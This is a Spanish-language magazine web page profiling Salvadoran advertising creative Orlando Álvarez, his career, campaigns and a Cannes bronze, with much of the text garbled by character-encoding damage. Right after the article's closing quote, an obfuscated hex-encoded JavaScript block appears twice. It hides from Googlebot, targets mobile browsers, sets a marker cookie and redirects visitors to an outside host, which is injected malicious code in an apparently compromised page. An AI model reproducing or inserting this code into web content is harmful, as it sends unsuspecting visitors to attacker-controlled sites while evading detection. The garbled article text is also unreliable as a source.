Sidebar Top

5 Jul 2016
Sidebar Top | Por: Redacción

Orlando A?lvarez, el publicista perseverante – Julio 2016

A sus nueve aAi??os empezA? a pintar y dibujar. Cuando creciA? quiso estudiar DirecciA?n de Cine Digital en CanadA?, sin embargo se quedA? en El Salvador y entrA? a la Escuela de ComunicaciA?n MA?nica Herrera a estudiar lo que mA?s se apegaba a sus gustos, la creatividad.

No obstante, Orlando seguAi??a con la ai???espinitaai??? y por ello, tomA? un curso en la New York Film Academy, pero fue ahAi?? donde descubriA? que su verdadera vocaciA?n estaba en la publicidad ai???Me iba a Barnes and Nobles, la librerAi??a, y terminaba viendo libros de publicidad, cuando estaba estudiando cine, entonces me dije no, esto es lo mAi??o y fue cuando decidAi?? enfocarme solamente en desarrollarme dentro de la carrera publicitariaai???.

AsAi?? mismo, obtuvo de sus padres los mejores consejos que lo ayudan inclusive ahora en su vida, tanto laboral, como personal, ai???el apoyo mA?s grande siempre ha sido aconsejA?ndome para llevar una vida recta y llena de valores, enfocarme en la familia y ser honesto, y siempre ser parte de un equipo, o sea siempre valorar a toda la gente con la que uno trabaja, ademA?s mi papA? siempre me decAi??a tu competencia mA?s grande sos vos mismo, ese es un consejo que hasta la fecha lo guardo y escuchoai???.

Este joven publicista tambiAi??n ha sabido superar los obstA?culos y considera que sin ellos, superar las cosas no fuera tan gratificante. ai???Creo que el obstA?culo mA?s grande ha sido en cA?mo es hacer que las cosas sucedan, porque muchas veces no todo el mundo tiene el mismo interAi??s o intenciA?n de lograr el resultado que vos estA?s queriendo liderar y para poderlo lograr, no solamente debes decir que hay que hacerlo, sino que estar con la gente haciAi??ndolo para llevarlo a caboai???.

Orlando cree que para que la publicidad sea efectiva tiene que ir de mano con la creatividad y conocer bien al pA?blico objetivo para poder generar una soluciA?n creativa de un problema de negocio. ai???Algo que es importante son las tensiones sociales, quAi?? es lo que estA? latente en el contexto de estas personas y que yo pueda hacer un mensaje que sea relevante para estas personasai???.

Dentro de todas las campaAi??as que ha realizado, Orlando guarda con mA?s cariAi??o a la que hizo en 2007 para Wendyai??i??s, donde se lanzA? la hamburguesa Chili Burger, cuya caracterAi??stica principal era que traAi??a chili, carne y por ello no necesitaba mA?s sabor. La idea se basA? en poner botes de salsa y mostaza que buscaban trabajo con rA?tulos por toda el A?rea metropolitana de San Salvador, todo esto sucediA? cuando empezaba Facebook y a pesar de eso obtuvieron 60 amigos. Al final de dicha campaAi??a, se revelA? que la salsa y mostaza estaban desempleados a causa de la Chili Burger.

ai???Fue la primera campaAi??a con la que me ganAi?? un premio en Festival del Caribe, fue plata en la categorAi??a de Marketing Viral y para esa Ai??poca que aquAi?? no existAi??a Facebook, hizo que me diera cuenta que estaba pasando algo fantA?stico en el A?mbito de la comunicaciA?nai???.

EmpezA? a trabajar en Publicidad Comercial, donde trabajA? por dos aAi??os y medio, luego estuvo 5 aAi??os en Apex BBDO, donde conociA? a su mentor, Salvador MartAi??nez. DespuAi??s, se trasladA? a DDB y fue parte del equipo fundador de Tribu DDB. Hace cinco aAi??os, fue llamado nuevamente para volver a formar parte de Publicidad Comercial, pero ahora esta vez como director creativo y colaborar en diferentes cosas.

Sin embargo, su primer trabajo fue ordenando los cassettes para poder tener los masters de los archivos, ya que no era la Ai??poca digital y le tocA? clasificar betacams, que son el equivalente de VHS, en el A?mbito publicitario. Luego, obtuvo una computadora, la peor de todo el piso, le tocA? recortar las carretillas del supermercado y las verduras en programas de ediciA?n de fotos. ai???De ahAi?? lo que pasA? fue que tuve la oportunidad de aquAi?? en la agencia ir creciendo hasta que me convertAi?? en diseAi??ador de un grupo y mi jefe creativo me daba la oportunidad de empezar a pensar en ideasai???.

Posteriormente, hizo su primera campaAi??a para el lanzamiento de la Hyundai Tucson en El Salvador, de la que aA?n recuerda pasar por la valla publicitaria y tomarle foto de la ilusiA?n que le generA? su trabajo. Luego, con el Consejo Internacional de DiseAi??o GrA?fico (Icograda) sacA? un Curso de DirecciA?n de Arte en JapA?n y al regresar a El Salvador ingresA? a Apex como director creativo, donde comenzA? a ganar festivales y premios creativos. Su A?ltima campaAi??a en Apex fue U2 VenAi??, donde trabajA? con Salvador MartAi??nez y ganaron un ClAi??o de plata en la categorAi??a de campaAi??as integradas durante la gala, siendo la segunda vez en la historia de El Salvador que Apex BBDO gana este reconocimiento.

Ya de nuevo en Publicidad Comercial, ai???en el 2012 tuvimos el primer shortlist de Cannes con una campaAi??a que hicimos para El Faro, que era el cA?mic de los ciudadanos. Fue el primer shortlist para Publicidad Comercial en 53 aAi??os y fue el tercer shortlist de Cannes en El Salvador. Ganamos premios en el Ojo de IberoamAi??rica, en el Festival de Antigua y en el Caribeai???.

ai???Es un gran ejemplo de pasiA?n a la publicidad y un ejemplo a seguir, ya que le gusta compartir su experiencia de su trayectoria, no se la queda para Ai??l, sino que la comparte con los demA?sai???, visualizador de Publicidad Comercial, Carlos LaAi??nez.

Este 2016, como parte de su trabajo en Publicidad Comercial, el periA?dico digital El Faro le entregA? un brief para desarrollar una campaAi??a de crowdfunding,Ai??ai???Diggers Against Injusticeai???, en inglAi??s, o ai???ExcavaciA?n Ciudadanaai???. En el Festival de Cannes entran a participar mA?s de 43 mil trabajos de todo el mundo ai???por lo que participar ahAi?? es como cuando El Salvador aspira jugar en el mundial de publicidad y ganar el oro, plata o bronce es ganar el mundial en Cannesai???.

ai???Es una inspiraciA?n y te deja opinar, toma en cuenta todas las opiniones de todos los del grupo y asAi?? se va formando la idea. Ai??l tiene como su base y ya sabe lo que quiere, pero igual vos aportas y eso funciona para que todo tome forma y sea parte de todosai???, visualizadora de Publicidad Comercial, Nicole PayAi??s.

SalvadoreAi??o del mes 1

Este aAi??o no fue al Festival de Cannes porque era el cumpleaAi??os de su hijo, y en esta ocasiA?n El Salvador obtuvo por primera vez el Cannes de Bronce, asAi?? mismo considerA? conveniente gastar los recursos con la gente que trabajA? en el proyecto. ai???Primero es quien lo hizo, no solamente fui yo sino que hubo un equipo detrA?s que lo trabajamos, varias personas no solamente Publicidad Comercial, sino que Rocket, The Happy Punk Panda y El Faro, porque sin ellos no se podrAi??a haber hecho nada de esto, entonces vale la pena celebrarlo como equipo que somos, mA?s que individualmenteai???.

SalvadoreAi??o del mes 2

ai???Fue una experiencia buenAi??sima trabajar con algo real, es lo que nos ayudA? un montA?n y que los resultados fueran buenos, contribuir con algo, no fue solamente un anuncio bonito, sino que realmente funcionA?, fue algo gratificante en realidadai???, jefa creativa de Publicidad Comercial, Carolina Lemus.

Orlando considera que desde el momento que se empieza a realizar una campaAi??a para ganarse un premio, se desvirtA?a la esencia del trabajo, ya que lo importante es hacer la mejor creatividad publicitaria para enaltecer al cliente y lograr los resultados que el cliente busca. ai???Si haces eso, aspiras a un premioai???.

SalvadoreAi??o del mes 3

ai???Como grupo estuvimos todos integrados y bajo una misma visiA?n que era dar los mejores resultados dentro de la campaAi??a, puesto que era una necesidad real de un cliente real, esa es una de las cosas que mA?s se valora al ganar el premio porque es algo que saliA? de verdad, entonces es bastante gratificante la experiencia y sobre todo el poder compartir con bastantes profesionales que se integraron dentro de la misma campaAi??aai???, visualizador en Publicidad Comercial, BenjamAi??n GaldA?mez.

SalvadoreAi??o del mes 4

ai???Tiene que haber un vAi??nculo con los consumidores y para lograr entender eso es que uno tiene que las marcas ya no son estA?ticas, estA?n vivas, tienen que tener una postura hacia la vida y la gente compartir esa misma visiA?n para convertirse en los defensores de tu marcaai???

Este exitoso joven aspira a seguir siendo curioso dentro de la publicidad, aprender de las personas, de sus compaAi??eros y de las personas que admira. AdemA?s, planea continuar con los proyectos que benefician a mA?s personas y los de transacciones comerciales, ai???creo que todos tenemos dones a los que se les debe de hacer honorai???.

SalvadoreAi??o del mes 5

A los jA?venes que desean entrar en el mundo de la publicidad, Orlando les incentiva a que conozcan el mundo, que sean humildes y que el talento no vale nada, sino hay consistencia. AdemA?s, que sean perseverantes, ya que no se deben dejar vencer porque les rechacen o no les salga a la primera. AsAi?? como, que la creatividad de verdad no estA? en los libros, estA? en la vida y los comportamientos de las personas. ai???Deben recordar que no vinimos al mundo a pagar facturas, A?por quAi?? no decidir dejar un impacto en la industria?ai???.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

1 May 2018
Celina de Sola, la salvadoreña que sabe que trabajando juntos se pueden transformar realidades
Sidebar Top | Por: Redacción

Celina de Sola, la salvadoreña que sabe que trabajando juntos se pueden transformar realidades

3 Abr 2018
JosA� Ever Landaverde, el emprendedor de la contabilidad en El Salvador / abril 2018
Sidebar Top | Por: Redacción

JosA� Ever Landaverde, el emprendedor de la contabilidad en El Salvador / abril 2018

6 Mar 2018
MarA�a Eugenia Brizuela, la primer mujer canciller, ahora presidenta de Voces Vitales / Febrero 2018
Sidebar Top | Por: Redacción

MarA�a Eugenia Brizuela, la primer mujer canciller, ahora presidenta de Voces Vitales / Febrero 2018

6 Feb 2018
JosA� Giammattei, el emprendedor tecnolA?gico de celulares y computadoras/ Febrero 2018
Sidebar Top | Por: Redacción

JosA� Giammattei, el emprendedor tecnolA?gico de celulares y computadoras/ Febrero 2018